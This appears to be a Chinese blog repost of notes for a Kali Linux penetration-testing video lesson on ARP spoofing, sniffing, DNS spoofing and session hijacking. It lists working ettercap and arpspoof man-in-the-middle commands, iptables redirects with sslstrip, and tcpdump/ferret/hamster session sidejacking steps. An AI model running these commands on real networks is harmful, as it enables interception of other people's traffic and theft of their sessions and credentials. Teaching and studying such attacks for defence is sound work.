Kali Linux Web 渗透测试视频教程—第十四课-arp欺骗、嗅探、dns欺骗、session劫持

简介:

Kali Linux Web 渗透测试视频教程—第十四课-arp欺骗、嗅探、dns欺骗、session劫持

/玄魂

目录

Kali Linux Web 渗透测试—第十四课-arp欺骗、嗅探、dns欺骗、session劫持      1

关于嗅探、arp欺骗、会话劫持.............................................................. 1

 

视频教程地址:http://edu.51cto.com/course/course_id-1887.html

关于嗅探、arp欺骗、会话劫持

l  1. google

l  2. http://www.cnblogs.com/xuanhun/archive/2009/01/05/1369828.html

l  http://www.cnblogs.com/xuanhun/archive/2009/04/22/1441274.html

会话劫持的实现手段

 

l  中间人攻击(arp欺骗,dns欺骗)

l  注射式攻击

Arp欺骗--ettercap

l  参数说明:http://www.91ri.org/4408.html

l  2.如果你是第一次进行中间人攻击操作,那么要对kali下的ettercap做点配置,配置文件是/etc/ettercap/etter.conf
首先你要将EC_UID EC_GID都变为0,然后找到LINUX分类下的IF YOU USE IPTABLES这一行,将注释(“#”号)去掉,打开转发。

3./etc/NetworkManager/NetworkManager.conf  修改

4.service network-manager restart

5.echo 1 >> /proc/sys/net/ipv4/ip_forward

6. ettercap -i wlan0 -Tq -M arp:remote /192.168.2.20/ /192.168.2.1/

Arp欺骗arpspoof

l   echo 1 >> /proc/sys/net/ipv4/ip_forward

l   arpspoof -i eth0 -t 192.168.14.2 192.168.14.132

数据包捕获

l  tcpdump

l  wireshark

l  drafnet等其他自动化工具

Ssl数据嗅探

l  iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000(设置)

l  iptables -t nat -D PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000(取消)

l  sslstrip  -p -l 10000 -w log.txt

session劫持-arp欺骗

l  tcpdump -i eth0 -w qq.cap

l  ferret -r qq.cap

l  hamster

l  http://hamster

l  选择目标

l  测试session

64位下ferret 安装

l   dpkg --add-architecture i386

l   apt-get clean && apt-get update && apt-get upgrade -y && apt-get dist-upgrade -y

l   sudo aptitude install ferret-sidejack:i386

 

session劫持-DNS欺骗

l   1. 使用 ettercap 进行arp欺骗

l   2.修改etter.dns 文件

/etc/ettercap/etter.dns

l   3.启用dns_spoof

课后练习

l  结合前面课程中的 set 工具集,我们在局域网中能做到天衣无缝(钓鱼和消息转发相结合)的钓鱼攻击吗?

l  局域网中的嗅探、钓鱼、session劫持、dns欺骗这一类的攻击的防御方式是什么?

 视频教程地址:http://edu.51cto.com/course/course_id-1887.html

ps:对此文章感兴趣的读者,可以加qq群:Hacking:303242737;Hacking-2群:147098303Hacking-3群:31371755hacking-4:201891680;Hacking-5群:316885176

 


本文转自玄魂博客园博客,原文链接:http://www.cnblogs.com/xuanhun/p/4117209.html,如需转载请自行联系原作者

目录
相关文章
|
3月前
|
运维 网络协议 网络安全
Kali虚拟机间搭建iodine DNS隧道实验指南
本指南介绍如何在两台Kali虚拟机间使用iodine搭建DNS隧道。通过服务端(192.168.1.44)与客户端(192.168.1.36)配置,利用DNS查询建立虚拟局域网,实现受限网络下的隐蔽通信。包含环境准备、命令详解、连通性测试及故障排查,助你快速掌握DNS隧道技术原理与实践应用。(238字)
534 7
|
4月前
|
存储 安全 Linux
Kali Linux 2025.3 发布 (Vagrant & Nexmon) - 领先的渗透测试发行版
Kali Linux 2025.3 发布 (Vagrant & Nexmon) - 领先的渗透测试发行版
644 0
|
7月前
|
存储 安全 Linux
Kali Linux 2025.2 发布 (Kali 菜单焕新、BloodHound CE 和 CARsenal) - 领先的渗透测试发行版
Kali Linux 2025.2 发布 (Kali 菜单焕新、BloodHound CE 和 CARsenal) - 领先的渗透测试发行版
411 0
|
网络协议 Linux Docker
在Linux中,如何指定dns服务器,来解析某个域名?
在Linux中,如何指定dns服务器,来解析某个域名?
|
弹性计算 网络协议 Ubuntu
如何在阿里云国际版Linux云服务器中自定义配置DNS
如何在阿里云国际版Linux云服务器中自定义配置DNS
|
监控 安全 Linux
如何利用Kali Linux进行网站渗透测试:最常用工具详解
如何利用Kali Linux进行网站渗透测试:最常用工具详解
879 6
|
安全 Linux 测试技术
Kali Linux预装的自动化渗透测试工具
Kali Linux预装的自动化渗透测试工具
891 2
|
域名解析 存储 缓存
在Linux中,DNS进行域名解析的过程是什么?
在Linux中,DNS进行域名解析的过程是什么?
|
安全 网络安全 数据安全/隐私保护
Python渗透测试之流量分析:流量嗅探工具编程
Python渗透测试之流量分析:流量嗅探工具编程
260 0

相关产品

  • 云解析DNS